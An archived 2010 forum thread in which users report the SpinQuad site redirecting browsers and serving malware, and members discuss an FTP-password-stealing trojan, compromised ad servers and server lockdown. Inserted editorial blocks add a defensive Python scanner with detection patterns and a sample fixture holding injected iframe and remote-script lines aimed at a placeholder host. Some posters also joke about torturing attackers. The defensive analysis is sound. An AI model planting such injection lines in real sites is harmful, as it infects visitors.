View Full Version : Spinquad hijack attack!!



prometheus
07-19-2010, 11:50 AM
I was about to browse through spinquad.com
I was using Opera and then SeaMonkey. Opera froze and SeaMonkey was directly redirected to another site located somewhere at http://yandex.ru.

Looks to me like someone has constantly been attacking spinquad with
spam, viruses and hijacks. It's a pity since people might be scared away from the site.
I haven't tested with Explorer or Firefox yet.

Michael

Elmar Moelzer
07-19-2010, 12:04 PM
Had the same happening to me today with IE.
My antivirus software caught the bugger, but IE crashed anyway.
What a fracking bastard!
Really, if I ever catch one of these people there will be a bloodbath!

roctavian
07-19-2010, 12:11 PM
Really, if I ever catch one of these people there will be a bloodbath!

You always looked such a peaceful guy to me, Elmar.

speismonqui
07-19-2010, 12:33 PM
what if its an AD guy?

Elmar Moelzer
07-19-2010, 12:34 PM
I am normally a very peaceful guy, but there are a few things that I can not tolerate. These people and their deeds are among them.

Hopper
07-19-2010, 12:39 PM
I put SpinQuad on my "blocked" list after the last go-round. I haven't seen the need to visit the site recently anyway .. pretty much dead.

Elmar Moelzer
07-19-2010, 12:45 PM
pretty much dead

I did not quite see it that way, actually. But the viruses make me angry!
That is bad for my heart.

Cageman
07-19-2010, 12:52 PM
Had the same happening to me today with IE.
My antivirus software caught the bugger, but IE crashed anyway.
What a fracking bastard!
Really, if I ever catch one of these people there will be a bloodbath!

Hehe... you will make them look like your avatar!!! :D

Avast reported a malware from SpinQuad just recently... :/

shrox
07-19-2010, 12:52 PM
...That is bad for my heart.

Well, at least you have an excellent visualization of it...

3dworks
07-19-2010, 12:58 PM
looking fine here with safari 5 under OSX...

Matt
07-19-2010, 01:01 PM
Had the same happening to me today with IE.
My antivirus software caught the bugger, but IE crashed anyway.
What a fracking bastard!
Really, if I ever catch one of these people there will be a bloodbath!

1000000% behind you dude, these people are total scumbags.

Elmar Moelzer
07-19-2010, 03:03 PM
Well, at least you have an excellent visualization of it...
Yeah, my avatar should give you an idea what the guy would look like when I am halfway through with him ;)

Salv8or
07-19-2010, 05:19 PM
Noticed the same thing while trying to access Spinquad earlier today. Sooo freaking annoying, and what do they gain from it??? A couple of site hits?? I'll give you guys an alibi any day to do what you like with the persons behind things like this.

3dWannabe
07-19-2010, 05:22 PM
Try Firefox http://www.mozilla.com/en-US/

with NoScript
https://addons.mozilla.org/en-US/firefox/addon/722/

Lightwolf
07-19-2010, 05:46 PM
Hm, I just checked with Opera and had no problems.

And yes, I normally do get warned by Avast.

Cheers,
Mike

kurv
07-19-2010, 11:18 PM
We caught it and fixed it... thanks guys.

Yes if I ever catch one of these guys... I will take them straight to Elmar ;)

Silkrooster
07-19-2010, 11:44 PM
We caught it and fixed it... thanks guys.

Yes if I ever catch one of these guys... I will take them straight to Elmar ;)

You take the feet. I have their arms...:devil: (did I say that? snort, snort {Steve Urkel's voice})

OnlineRender
07-20-2010, 02:37 AM
We caught it and fixed it... thanks guys.

Yes if I ever catch one of these guys... I will take them straight to Elmar ;)

But didn't Frodo take the ring to Mordor ................
(IT CROWD QUOTE) :P

aurora
07-20-2010, 01:26 PM
Hey, I get first crack at one of these [email protected][email protected]%#'s. Death is too easy; long, slow, never-ending torture, ahh, now that's the balm to soothe the pain of dealing with them demonic [email protected][email protected]%#'s.

kurv
07-20-2010, 03:43 PM
Okay..... quietly shifts his concern from Elmar to aurora...........

wjo53
07-20-2010, 03:53 PM
Hey, I get first crack at one of these [email protected][email protected]%#'s. Death is too easy; long, slow, never-ending torture, ahh, now that's the balm to soothe the pain of dealing with them demonic [email protected][email protected]%#'s.

...hang him by the eyelids, and beat him in the b*lls until he blinks...

Elmar Moelzer
07-20-2010, 03:55 PM
I think these bastards all have small reproductive organs. That is why they are so eager to get attention...

Cageman
07-20-2010, 07:03 PM
I just recently visited SpinQuad and I still get warnings from Avast. :/

andrew_y
07-20-2010, 08:44 PM
ya it's still there as of 9:25 CST.

If this is what I am thinking it is... Lemme explain what is going on here, and how to combat it.

First, a question...Is this an iframe/html.inf issue? do you see a line of code at the bottom of the page?

If so, read on, if not, ignore.

You need to take a close look at any file with the word "index" in it, as well as all .js files... always at the bottom of the file, there is a line of code, remove it. Do the same with all .js files.

Next, remove all passwords from your FTP app.

Scan and clean your local computer. (avast and malwarebytes works well for this)

Change ALL passwords via the admin control panel or whatever, on your server, that is associated to what you had stored in the FTP app.

This particular trojan will steal passwords from popular FTP apps. It is dropped onto your local machine via an infected site or banner. Once it is on your local machine, it sniffs out the passwords stored in an FTP app, then phones home. Person gets the info, logs in, and utilizes the server for spam e-mail.

The catch here is, when someone visits the site, it replicates itself, and the villain in this case has a never-ending supply of FTP credentials to log into to host spam images and such.

Best way to stay safe? Store no passwords in your FTP app. Even if you get it, it won't phone home, 'cause there is no data to relay.

If you're on Win7, look at the folders:
c/users/username/AppData/Local .. or ..
c/users/username/AppData/roaming

In that location is where some wack exe's will reside at the root. There will be a few references to them in the registry as well.

Good luck
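
The file check described in the post above (look at every file with "index" in its name and every .js file, inspect the last line, remove the injected line), as an added example that is not code from the post or from SpinQuad. It builds a constructed sample web root in a temp directory (hostnames are placeholders, the indicator names are mine), reports in-scope files whose last non-blank line carries an iframe, remote script tag or obfuscated-JS decoder, and offers the one-line removal step. Run it against an offline copy of the site files, not the live server, and review each reported line before stripping it:

```python
import re
import tempfile
from pathlib import Path

# Scope from the post: any file with "index" in its name, plus every .js file.
IN_SCOPE = re.compile(r"index|\.js$", re.IGNORECASE)

# Indicators of an appended injection line (names chosen here for reporting).
INDICATORS = [
    ("iframe-tag", re.compile(r"<iframe\b", re.IGNORECASE)),
    ("remote-script-tag", re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)),
    ("document.write-unescape", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.IGNORECASE)),
    ("eval-decoder", re.compile(r"\beval\s*\(\s*(?:unescape|String\.fromCharCode)\b", re.IGNORECASE)),
]
# Zero-size or invisible element: an injected frame is meant not to be seen.
HIDDEN = re.compile(r"""width\s*=\s*['"]?0\b|height\s*=\s*['"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
                    re.IGNORECASE)


def last_nonblank_line(path):
    """Return the last non-empty line of a file (the spot the post says to look)."""
    for line in reversed(Path(path).read_text(errors="replace").splitlines()):
        if line.strip():
            return line
    return ""


def classify_line(line):
    """Names of the indicators matching one line; an empty list means nothing suspicious."""
    hits = [name for name, rx in INDICATORS if rx.search(line)]
    if hits and HIDDEN.search(line):
        hits.append("hidden-element")
    return hits


def scan_webroot(root):
    """Walk a copy of the web root and report in-scope files whose last line looks injected."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or not IN_SCOPE.search(path.name):
            continue
        tail = last_nonblank_line(path)
        hits = classify_line(tail)
        if hits:
            findings.append({
                "file": path.relative_to(root).as_posix(),
                "line": tail.strip(),
                "indicators": hits,
            })
    return findings


def strip_tail_line(path):
    """Remediation step from the post: drop the file's last non-blank line and return it."""
    path = Path(path)
    lines = path.read_text(errors="replace").splitlines()
    while lines and not lines[-1].strip():
        lines.pop()
    removed = lines.pop() if lines else ""
    path.write_text("\n".join(lines) + ("\n" if lines else ""))
    return removed


def build_sample_site():
    """Constructed sample web root (not real SpinQuad files): two clean, two with an appended line."""
    root = Path(tempfile.mkdtemp(prefix="sq_scan_"))
    files = {
        "index.html": "<html><body><h1>Forum</h1></body></html>\n",
        "js/menu.js": "function openMenu() { return true; }\n",
        "style.css": "body { margin: 0 }\n",  # out of scope: neither 'index' nor .js
        # appended hidden iframe pointing at a placeholder host
        "forum/index.php": "<?php include 'global.php'; ?>\n</html>\n"
                           "<iframe src=\"http://INJECTED-HOST.invalid/in.php\" width=0 height=0></iframe>\n",
        # appended packed JS that writes a remote script tag
        "js/common.js": "var sq = {};\n"
                        "document.write(unescape('%3Cscript src=%22http://INJECTED-HOST.invalid/a.js%22%3E%3C/script%3E'));\n",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for finding in scan_webroot(site):
        print(finding["file"], finding["indicators"], "->", finding["line"][:60])
```

The scan only looks at the final line because that is where this family of injections is tacked on; a file whose injected line sits elsewhere, or a file that was wholly replaced, still needs a diff against a known-good copy of the forum software.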

Cageman
07-20-2010, 08:54 PM
Andrew,

Was your message targeted to Kurv, or us who have visited the site?

Since Avast have stopped this bugger for some time, I'm pretty sure I'm clean. I also took a look inside the folders you mentioned and could not find any weirdness there (thanks to Avast memory protection). :)

andrew_y
07-20-2010, 09:12 PM
It's more of an education type of response for whomever reads it. It may affect others too. It's just better if we are all educated on this, so we know what to look for if this is the case.

I cannot say for sure what is happening here on SQ, I could be totally wrong on this issue, however, it seems to me that this has popped up a few times and kinda fits the profile of this particular issue... and just wanted to bring it up. It is a well known and documented hunk of malware, but it can be tricky too.

I hate to see these things proliferate across the net, and the more one is educated on what this is exactly, the better off we are on stopping it on many angles in the future.

danielkaiser
07-20-2010, 09:54 PM
Don't know if this will help but here is the error I get.

inquisitive
07-21-2010, 01:40 PM
Please do not send spinquad email newsletters until you cure your virus issue. I just clicked on one of the newsletter links and right off the bat received a warning from Norton.

Risk Name: MSIE Java Deployment Toolkit Input Invalidation
Attacker URL: why include it - we don't want more people to go get infected.

The issue is obviously not fixed.
First thing I would do would be to suspend all of your ads, turn them off and see if the issue goes away, and backtrack from there. Either the site itself is compromised, or one ad campaign is the culprit.

Waves of light
07-21-2010, 01:49 PM
Utter set of BĢ*$Ģ$(* the lot of em. Nothing better to do... 'oh, guys... check this it out, it will be hilarious'. Bet none of them ever get laid.

kurv
07-21-2010, 01:58 PM
I have scanned the site with Norton and get no notices. Have you tried deleting your cache and trying it again?

kurv
07-21-2010, 02:10 PM
It's more of an education type of response for whomever reads it. It may affect others too. It's just better if we are all educated on this, so we know what to look for if this is the case.

I cannot say for sure what is happening here on SQ, I could be totally wrong on this issue, however, it seems to me that this has popped up a few times and kinda fits the profile of this particular issue... and just wanted to bring it up. It is a well known and documented hunk of malware, but it can be tricky too.

I hate to see these things proliferate across the net, and the more one is educated on what this is exactly, the better off we are on stopping it on many angles in the future.

Thanks Andrew, I appreciate the help :)

We fixed this issue a few days ago, and yes it was a small line of code. We changed passwords and locked down the site. Just as you instructed...

We have scanned the site with Norton using Chrome and Firefox and found no errors, especially before sending out a newsletter. :)

inquisitive
07-21-2010, 03:02 PM
I was using IE8; if you don't check your site with all browsers you may not find the issue. If the issue is a rogue ad campaign, the bad guys can target it to only display to specific browsers. I could use Firefox (and mainly use it, but I just so happened to be using IE8 this time).

Here is the screencap of the incident I just reported.

inquisitive
07-21-2010, 03:34 PM
I suggest all of you that receive warnings to do a full scan as well... I just did (still going) it seems that while it blocked the attack it was not able to fully prevent it.

kurv
07-21-2010, 04:29 PM
Weird, I have scanned the site and I also have IE8 as well as Chrome, FireFox and Safari.

We are not finding any issues.

If there were a banner issue, I have refreshed the page now many, many times and never get an alert from IE8. If this is a banner, the chances of you hitting it every time are astronomical.

Otherwise it would be a site issue and again, scan image is below from Norton and IE Live Scan.

http://www.spinquad.com/post/SQ-Security-image.jpg

inquisitive
07-21-2010, 06:26 PM
You may want to check your version of OpenX, perhaps that is the culprit.
More attacks using compromised OpenX ad-servers
http://www.sophos.com/blogs/sophoslabs/?p=10343

The other suggestions would be:
FTP a copy of your forum files (offline backup) to your local windows machine and then have clamwin run on that folder (I have found compromised wordpress files that way).

If you have the latest version of your ad server running then it could be a third party campaign or a flash campaign.
Re: refreshing browser multiple times.. did you clear your cookies every time you refreshed? Some ad campaigns (general and bad ones) are set to frequency capping and in some cases targeted to specific browsers and/or geographical areas.. by clearing your cookies you basically reset that frequency cap.

Anyways, I hope you guys clear this issue, otherwise the only way to view the site safely would be to run noscript plugin for firefox or some ad blocker (or use a Mac).

Please let us know what your findings are.

Thanks

Myagi
07-21-2010, 06:27 PM
If there were a banner issue, I have refreshed the page now many, many times and never get an alert from IE8. If this is a banner, the chances of you hitting it every time are astronomical.

Sorry to butt in, but aren't many ad banner services often region/country sensitive, meaning it's not certain you'll get all the same banners someone else might. Not that I know if the spinquad banners are of that nature, or what region the poster is in (or if there are different banners for different regions inside the US).

Just thought I'd throw that in there :)

OlaHaldor
07-21-2010, 10:53 PM
looking fine here with safari 5 under OSX...

As ignorant as I or we Mac users can be... Doesn't it look good here on the other side of the fence? The grass is definitely greener.. :bday:

Lewis
07-22-2010, 02:03 AM
NOD32 pops up like a madman visiting spinquad.com. About 10 alerts/js/trojan stuff (just tried it now).

EDIT: Here is screen grab of what NOD32 said about "threats"

Kuzey
07-22-2010, 07:57 AM
SQ is launching media player and trying to download an encrypted file :(

Also, on the SQ site, it tells me I need an additional plugin and has a button to download it....firefox & XP pro.

Hope that helps to narrow it down.

Kuzey

Lightwolf
07-22-2010, 08:05 AM
SQ is launching media player and trying to download an encrypted file :(
It sounds like one of these:
http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html
(Quite an interesting read if you want to know what's actually happening behind the scenes)

Cheers,
Mike

OnlineRender
07-23-2010, 01:52 PM
Sorry to butt in, but aren't many ad banner services often region/country sensitive, meaning it's not certain you'll get all the same banners someone else might. Not that I know if the spinquad banners are of that nature, or what region the poster is in (or if there are different banners for different regions inside the US).

Just thought I'd throw that in there :)

Correct /\ but also dependent on who your banner source is.. so that would be a yes again.. also works on keyword sensitivity.

OnlineRender
07-23-2010, 02:19 PM
You may want to check your version of OpenX, perhaps that is the culprit.


Well done, Sherlock! :thumbsup: Spot on!

If I was a betting man, "which I am", I would have a small wager on that.... but there is also something else running.

VicMackey
07-23-2010, 06:28 PM
Guys as of last night (23rd July) it was still there and I got a nasty dose of it, straight from a link from an email from SQ. It wasn't in my cache because I haven't been to the forum for weeks nor did I visit that page before. I've outlined the problem and infections I caught in this thread:
http://www.newtek.com/forums/showthread.php?t=110810&page=2

aurora
07-23-2010, 10:55 PM
Vic, we know and as of right now it's worse. Wes has contacted the people at VB and we have purchased VB4 and will be updating ASAP and making a couple of other changes to fix these problems.

Thank you for the information you have provided. ALL information is extremely helpful in fixing this problem and thus very much appreciated!

inquisitive
07-23-2010, 11:02 PM
If the situation is that bad, you guys should just take the site offline. No sense having people get infected; also you just give the bad guys more opportunities to cause trouble. If you guys have static IP addresses at home, lock down the server so only connections from those IPs are allowed to connect (ssh/ftp - you should really be using sftp). (You may just have to wipe out the server and reinstall everything, and hopefully you had current backups.)
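
An sshd_config fragment for the lockdown suggested above, added here as an example and not taken from the thread or from SpinQuad's server: it retires password logins (the credential class the FTP-stealing trojan targets), serves file transfer over SFTP instead of plain FTP, and admits only the named admin account from two static home addresses. The user name and the addresses (documentation ranges) are placeholders; sshd_config does not accept trailing comments, so each note sits on its own line:

```text
# keys only: a password lifted from an FTP client or keylogger is useless here
PasswordAuthentication no
# file transfer over SSH; stop the plain-FTP daemon altogether
Subsystem sftp internal-sftp
# only this account, and only from the admins' static home IPs (placeholders)
AllowUsers sqadmin@203.0.113.10 sqadmin@198.51.100.7
```

Test the new configuration from a second, still-open session before closing the first one, since a typo in AllowUsers locks everyone out; and the web tier still needs the firewall to admit 80/443 from everywhere, so the address restriction belongs on the management ports only.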

slacer
07-24-2010, 12:39 AM
And don't forget to check if the backup is already infected.

VicMackey
07-24-2010, 09:17 AM
Vic, we know and as of right now it's worse. Wes has contacted the people at VB and we have purchased VB4 and will be updating ASAP and making a couple of other changes to fix these problems.

Thank you for the information you have provided. ALL information is extremely helpful in fixing this problem and thus very much appreciated!

No worries. Hope you get it sorted :)